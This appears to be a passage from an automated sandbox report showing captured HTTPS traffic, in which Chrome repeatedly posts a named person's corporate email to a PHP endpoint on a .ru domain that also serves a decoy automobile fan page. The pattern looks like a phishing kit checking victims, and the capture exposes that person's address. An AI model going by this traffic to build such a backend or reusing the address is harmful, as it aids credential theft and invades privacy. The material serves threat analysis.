                                                                Data Ascii: <li class="list-inline-item"> <a href="https://glansaolksnu.ru/#privacy">Privacy</a> </li> <li class="list-inline-item"> <a href="https://glansaolksnu.ru/#terms">Terms</a> </li>
                                                                2024-08-27 18:11:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                25192.168.2.549756104.21.51.1384436276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-08-27 18:11:47 UTC775OUTPOST ///7627.php HTTP/1.1
                                                                Host: glansaolksnu.ru
                                                                Connection: keep-alive
                                                                Content-Length: 47
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                Accept: application/json, text/javascript, */*; q=0.01
                                                                Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                sec-ch-ua-platform: "Windows"
                                                                Origin: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Referer: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-08-27 18:11:47 UTC47OUTData Raw: 64 6f 3d 63 68 65 63 6b 26 65 6d 3d 63 61 72 6f 6c 69 6e 65 2e 76 69 61 6e 6e 61 40 67 6c 6f 62 61 6c 66 6f 75 6e 64 72 69 65 73 2e 63 6f 6d
                                                                Data Ascii: do=check&em=caroline.vianna@globalfoundries.com
                                                                2024-08-27 18:11:49 UTC776INHTTP/1.1 200 OK
                                                                Date: Tue, 27 Aug 2024 18:11:48 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                x-powered-by: PHP/7.3.33
                                                                access-control-allow-origin: *
                                                                cache-control: no-store, no-cache, must-revalidate, max-age=0
                                                                pragma: no-cache
                                                                expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                vary: Accept-Encoding
                                                                CF-Cache-Status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5o0dt1kERf%2B2pK9DuRAeVIWGzxJLia6K1WXKQuhsLzzS0ejNqIqeFgIN4akH4ApToZXHAIuuk1xyD%2FLr2G5%2BRXVaEDotij33elBpUfVrxiG2j2P0rN8SxG9K255KJFVPdvs%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8b9e06adecd8421d-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2024-08-27 18:11:49 UTC24INData Raw: 31 32 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 7d 0d 0a
                                                                Data Ascii: 12{"status":"error"}
                                                                2024-08-27 18:11:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                26192.168.2.549757104.21.51.1384436276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-08-27 18:11:49 UTC349OUTGET ///7627.php HTTP/1.1
                                                                Host: glansaolksnu.ru
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-08-27 18:11:50 UTC776INHTTP/1.1 200 OK
                                                                Date: Tue, 27 Aug 2024 18:11:50 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                x-powered-by: PHP/7.3.33
                                                                access-control-allow-origin: *
                                                                cache-control: no-store, no-cache, must-revalidate, max-age=0
                                                                pragma: no-cache
                                                                expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                vary: Accept-Encoding
                                                                CF-Cache-Status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lmIH1FAPmRAZ3PqrxV23iJ9BvJkcGAyCc3xYb7OkXWOCrFZJwCYNPcxe6XkaNY0wUjJvNAXw53Bet%2BVqWHvcBWyU8eveVYRBJdmuaa%2BRVhsoZv1vEU5aaouo7rKoI%2BAFqPg%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8b9e06bc7bd58c1d-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2024-08-27 18:11:50 UTC593INData Raw: 31 61 64 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 75 74 6f 6d 6f 62 69 6c 65 20 48 69 73 74 6f 72 79 20 46 61 6e 73 20 2d 20 67 6c 61 6e 73 61 6f 6c 6b 73 6e 75 2e 72 75 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74
                                                                Data Ascii: 1adf<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Automobile History Fans - glansaolksnu.ru</title> <link href="https://cdn.jsdelivr.net
                                                                2024-08-27 18:11:50 UTC1369INData Raw: 73 3a 2f 2f 74 68 2e 62 69 6e 67 2e 63 6f 6d 2f 74 68 2f 69 64 2f 4f 49 50 2e 4b 55 4c 4e 53 73 61 72 44 52 73 4e 33 35 42 31 32 31 4b 70 74 51 48 61 45 4b 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 63 65 6e 74 65 72 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 20 63 6f 76 65 72 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 35 30 70 78 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 65 6e 74 2d 73 65 63 74 69 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20
                                                                Data Ascii: s://th.bing.com/th/id/OIP.KULNSsarDRsN35B121KptQHaEK') no-repeat center center; background-size: cover; color: white; padding: 150px 0; text-align: center; } .content-section {
                                                                2024-08-27 18:11:50 UTC1369INData Raw: 73 3a 2f 2f 67 6c 61 6e 73 61 6f 6c 6b 73 6e 75 2e 72 75 2f 23 22 3e 48 6f 6d 65 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6c 61 6e 73 61 6f 6c 6b 73 6e 75 2e 72 75 2f 23 61 62 6f 75 74 22 3e 41 62 6f 75 74 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 22 3e 0d 0a 20 20 20 20 20 20 20 20 20
                                                                Data Ascii: s://glansaolksnu.ru/#">Home</a> </li> <li class="nav-item"> <a class="nav-link" href="https://glansaolksnu.ru/#about">About</a> </li> <li class="nav-item">
                                                                2024-08-27 18:11:50 UTC1369INData Raw: 33 35 32 32 31 36 33 31 33 61 33 37 33 38 32 35 33 37 33 39 33 61 33 64 32 35 33 38 32 33 37 38 32 34 32 33 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 5f 5f 63 66 5f 65 6d 61 69 6c 5f 5f 22 20 64 61 74 61 2d 63 66 65 6d 61 69 6c 3d 22 37 38 31 62 31 37 31 36 30 63 31 39 31 62 30 63 33 38 31 66 31 34 31 39 31 36 30 62 31 39 31 37 31 34 31 33 30 62 31 36 30 64 35 36 30 61 30 64 22 3e 5b 65 6d 61 69 6c 26 23 31 36 30 3b 70 72 6f 74 65 63 74 65 64 5d 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 20 6f 72 20 63 61 6c 6c 20 75 73 20 61 74 20 37 37 37 2d 35 31 39 2d 31 36 35 35 2e 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 6c 6f 63 6b 71 75 6f 74 65 20 63 6c 61 73 73 3d 22 62 6c 6f 63 6b 71 75 6f 74 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20
                                                                Data Ascii: 352216313a37382537393a3d253823782423"><span class="__cf_email__" data-cfemail="781b17160c191b0c381f1419160b191714130b160d560a0d">[email&#160;protected]</span></a> or call us at 777-519-1655.</p> <blockquote class="blockquote">
                                                                2024-08-27 18:11:50 UTC1369INData Raw: 74 3d 22 4d 6f 64 65 72 6e 20 53 75 70 65 72 63 61 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 61 72 64 2d 62 6f 64 79 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 35 20 63 6c 61 73 73 3d 22 63 61 72 64 2d 74 69 74 6c 65 22 3e 4d 6f 64 65 72 6e 20 53 75 70 65 72 63 61 72 73 3c 2f 68 35 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 63 61 72 64 2d 74 65 78 74 22 3e 45 78 70 6c 6f 72 65 20 74 68 65 20 6c 61 74 65 73 74 20 61 6e 64 20 67 72 65 61 74 65 73 74 20 69 6e 20 73 75 70 65 72 63 61 72 20 74 65 63 68 6e 6f 6c 6f 67 79 2c 20 70 65 72 66 6f 72 6d 61 6e 63 65 2c 20 61 6e 64 20
                                                                Data Ascii: t="Modern Supercar"> <div class="card-body"> <h5 class="card-title">Modern Supercars</h5> <p class="card-text">Explore the latest and greatest in supercar technology, performance, and
                                                                2024-08-27 18:11:50 UTC818INData Raw: 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6c 69 73 74 2d 69 6e 6c 69 6e 65 2d 69 74 65 6d 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6c 61 6e 73 61 6f 6c 6b 73 6e 75 2e 72 75 2f 23 70 72 69 76 61 63 79 22 3e 50 72 69 76 61 63 79 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6c 69 73 74 2d 69 6e 6c 69 6e 65 2d 69 74 65 6d 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6c 61 6e 73 61 6f 6c 6b 73 6e 75 2e 72 75 2f 23 74 65 72 6d 73 22 3e 54 65 72 6d 73 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0d 0a 20
                                                                Data Ascii: <li class="list-inline-item"> <a href="https://glansaolksnu.ru/#privacy">Privacy</a> </li> <li class="list-inline-item"> <a href="https://glansaolksnu.ru/#terms">Terms</a> </li>
                                                                2024-08-27 18:11:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                27192.168.2.549758104.21.51.1384436276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-08-27 18:12:00 UTC775OUTPOST ///7627.php HTTP/1.1
                                                                Host: glansaolksnu.ru
                                                                Connection: keep-alive
                                                                Content-Length: 47
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                Accept: application/json, text/javascript, */*; q=0.01
                                                                Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                sec-ch-ua-platform: "Windows"
                                                                Origin: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Referer: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-08-27 18:12:00 UTC47OUTData Raw: 64 6f 3d 63 68 65 63 6b 26 65 6d 3d 63 61 72 6f 6c 69 6e 65 2e 76 69 61 6e 6e 61 40 67 6c 6f 62 61 6c 66 6f 75 6e 64 72 69 65 73 2e 63 6f 6d
                                                                Data Ascii: do=check&em=caroline.vianna@globalfoundries.com
                                                                2024-08-27 18:12:01 UTC788INHTTP/1.1 200 OK
                                                                Date: Tue, 27 Aug 2024 18:12:01 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                x-powered-by: PHP/7.3.33
                                                                access-control-allow-origin: *
                                                                cache-control: no-store, no-cache, must-revalidate, max-age=0
                                                                pragma: no-cache
                                                                expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                vary: Accept-Encoding
                                                                CF-Cache-Status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H7VTFpof%2Bq%2BfrCbT6THXY7LKWeLa57%2BCm%2FiPnbB0uzQ%2FC5I2ZdOoAT4IMSEsQuYPa2ytA9c%2FPhQWqgYScf7g%2FnYYvHCNDVhb%2BtQQTQu70oobbcBWB1OyKpxaIBGM%2BJJbBVw%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8b9e0701cb210f74-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2024-08-27 18:12:01 UTC24INData Raw: 31 32 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 7d 0d 0a
                                                                Data Ascii: 12{"status":"error"}
                                                                2024-08-27 18:12:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                28192.168.2.549759104.21.51.1384436276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-08-27 18:12:02 UTC349OUTGET ///7627.php HTTP/1.1
                                                                Host: glansaolksnu.ru
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-08-27 18:12:02 UTC782INHTTP/1.1 200 OK
                                                                Date: Tue, 27 Aug 2024 18:12:02 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                x-powered-by: PHP/7.3.33
                                                                access-control-allow-origin: *
                                                                cache-control: no-store, no-cache, must-revalidate, max-age=0
                                                                pragma: no-cache
                                                                expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                vary: Accept-Encoding
                                                                CF-Cache-Status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lzbF7lpN0kb5ElUJsLr%2BOHbpe1yocEBbX3kHdNt1T%2Bqkt9o2R6rAwrzNY8gs%2Fx50B03y3qG7SQu%2FXDIimipz%2FWR1cdHQ9bvN1AomYg5MRwXSbfyNQwCcj%2Bh3PY9YUwnkICY%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8b9e070a392c78ed-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2024-08-27 18:12:02 UTC587INData Raw: 31 61 64 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 75 74 6f 6d 6f 62 69 6c 65 20 48 69 73 74 6f 72 79 20 46 61 6e 73 20 2d 20 67 6c 61 6e 73 61 6f 6c 6b 73 6e 75 2e 72 75 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74
                                                                Data Ascii: 1adf<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Automobile History Fans - glansaolksnu.ru</title> <link href="https://cdn.jsdelivr.net
                                                                2024-08-27 18:12:02 UTC1369INData Raw: 28 27 68 74 74 70 73 3a 2f 2f 74 68 2e 62 69 6e 67 2e 63 6f 6d 2f 74 68 2f 69 64 2f 4f 49 50 2e 77 62 38 71 61 39 30 4a 74 37 4d 7a 74 42 38 69 55 5f 75 6e 2d 67 41 41 41 41 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 63 65 6e 74 65 72 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 20 63 6f 76 65 72 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 35 30 70 78 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 65 6e 74 2d 73 65 63 74 69 6f 6e 20 7b 0d 0a 20
                                                                Data Ascii: ('https://th.bing.com/th/id/OIP.wb8qa90Jt7MztB8iU_un-gAAAA') no-repeat center center; background-size: cover; color: white; padding: 150px 0; text-align: center; } .content-section {
                                                                2024-08-27 18:12:02 UTC1369INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 67 6c 61 6e 73 61 6f 6c 6b 73 6e 75 2e 72 75 2f 23 22 3e 48 6f 6d 65 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6c 61 6e 73 61 6f 6c 6b 73 6e 75 2e 72 75 2f 23 61 62 6f 75 74 22 3e 41 62 6f 75 74 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 22 3e 0d 0a 20 20 20
                                                                Data Ascii: ="https://glansaolksnu.ru/#">Home</a> </li> <li class="nav-item"> <a class="nav-link" href="https://glansaolksnu.ru/#about">About</a> </li> <li class="nav-item">
                                                                2024-08-27 18:12:02 UTC1369INData Raw: 66 37 65 64 66 38 66 61 65 64 64 39 66 65 66 35 66 38 66 37 65 61 66 38 66 36 66 35 66 32 65 61 66 37 65 63 62 37 65 62 65 63 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 5f 5f 63 66 5f 65 6d 61 69 6c 5f 5f 22 20 64 61 74 61 2d 63 66 65 6d 61 69 6c 3d 22 32 65 34 64 34 31 34 30 35 61 34 66 34 64 35 61 36 65 34 39 34 32 34 66 34 30 35 64 34 66 34 31 34 32 34 35 35 64 34 30 35 62 30 30 35 63 35 62 22 3e 5b 65 6d 61 69 6c 26 23 31 36 30 3b 70 72 6f 74 65 63 74 65 64 5d 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 20 6f 72 20 63 61 6c 6c 20 75 73 20 61 74 20 37 37 37 2d 35 31 39 2d 31 36 35 35 2e 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 6c 6f 63 6b 71 75 6f 74 65 20 63 6c 61 73 73 3d 22 62 6c 6f 63 6b 71 75 6f 74 65 22 3e 0d 0a 20 20 20 20
                                                                Data Ascii: f7edf8faedd9fef5f8f7eaf8f6f5f2eaf7ecb7ebec"><span class="__cf_email__" data-cfemail="2e4d41405a4f4d5a6e49424f405d4f4142455d405b005c5b">[email&#160;protected]</span></a> or call us at 777-519-1655.</p> <blockquote class="blockquote">
                                                                2024-08-27 18:12:02 UTC1369INData Raw: 46 6a 22 20 61 6c 74 3d 22 4d 6f 64 65 72 6e 20 53 75 70 65 72 63 61 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 61 72 64 2d 62 6f 64 79 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 35 20 63 6c 61 73 73 3d 22 63 61 72 64 2d 74 69 74 6c 65 22 3e 4d 6f 64 65 72 6e 20 53 75 70 65 72 63 61 72 73 3c 2f 68 35 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 63 61 72 64 2d 74 65 78 74 22 3e 45 78 70 6c 6f 72 65 20 74 68 65 20 6c 61 74 65 73 74 20 61 6e 64 20 67 72 65 61 74 65 73 74 20 69 6e 20 73 75 70 65 72 63 61 72 20 74 65 63 68 6e 6f 6c 6f 67 79 2c 20 70 65 72 66 6f 72 6d 61 6e 63 65
                                                                Data Ascii: Fj" alt="Modern Supercar"> <div class="card-body"> <h5 class="card-title">Modern Supercars</h5> <p class="card-text">Explore the latest and greatest in supercar technology, performance
                                                                2024-08-27 18:12:02 UTC824INData Raw: 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6c 69 73 74 2d 69 6e 6c 69 6e 65 2d 69 74 65 6d 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6c 61 6e 73 61 6f 6c 6b 73 6e 75 2e 72 75 2f 23 70 72 69 76 61 63 79 22 3e 50 72 69 76 61 63 79 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6c 69 73 74 2d 69 6e 6c 69 6e 65 2d 69 74 65 6d 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6c 61 6e 73 61 6f 6c 6b 73 6e 75 2e 72 75 2f 23 74 65 72 6d 73 22 3e 54 65 72 6d 73 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f
                                                                Data Ascii: <li class="list-inline-item"> <a href="https://glansaolksnu.ru/#privacy">Privacy</a> </li> <li class="list-inline-item"> <a href="https://glansaolksnu.ru/#terms">Terms</a> </
                                                                2024-08-27 18:12:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                29192.168.2.54976040.68.123.157443
                                                                TimestampBytes transferredDirectionData
                                                                2024-08-27 18:12:08 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=FnM5CyNXVMxGvGD&MD=7xYbZndX HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Accept: */*
                                                                User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                Host: slscr.update.microsoft.com
                                                                2024-08-27 18:12:08 UTC560INHTTP/1.1 200 OK
                                                                Cache-Control: no-cache
                                                                Pragma: no-cache
                                                                Content-Type: application/octet-stream
                                                                Expires: -1
                                                                Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                MS-CorrelationId: 1934c323-885a-4da1-882c-f411515f33be
                                                                MS-RequestId: 59d5b08c-1f92-4230-86df-19ae26441592
                                                                MS-CV: cSEx3UIkzEKo9JMO.0
                                                                X-Microsoft-SLSClientCache: 1440
                                                                Content-Disposition: attachment; filename=environment.cab
                                                                X-Content-Type-Options: nosniff
                                                                Date: Tue, 27 Aug 2024 18:12:07 GMT
                                                                Connection: close
                                                                Content-Length: 30005
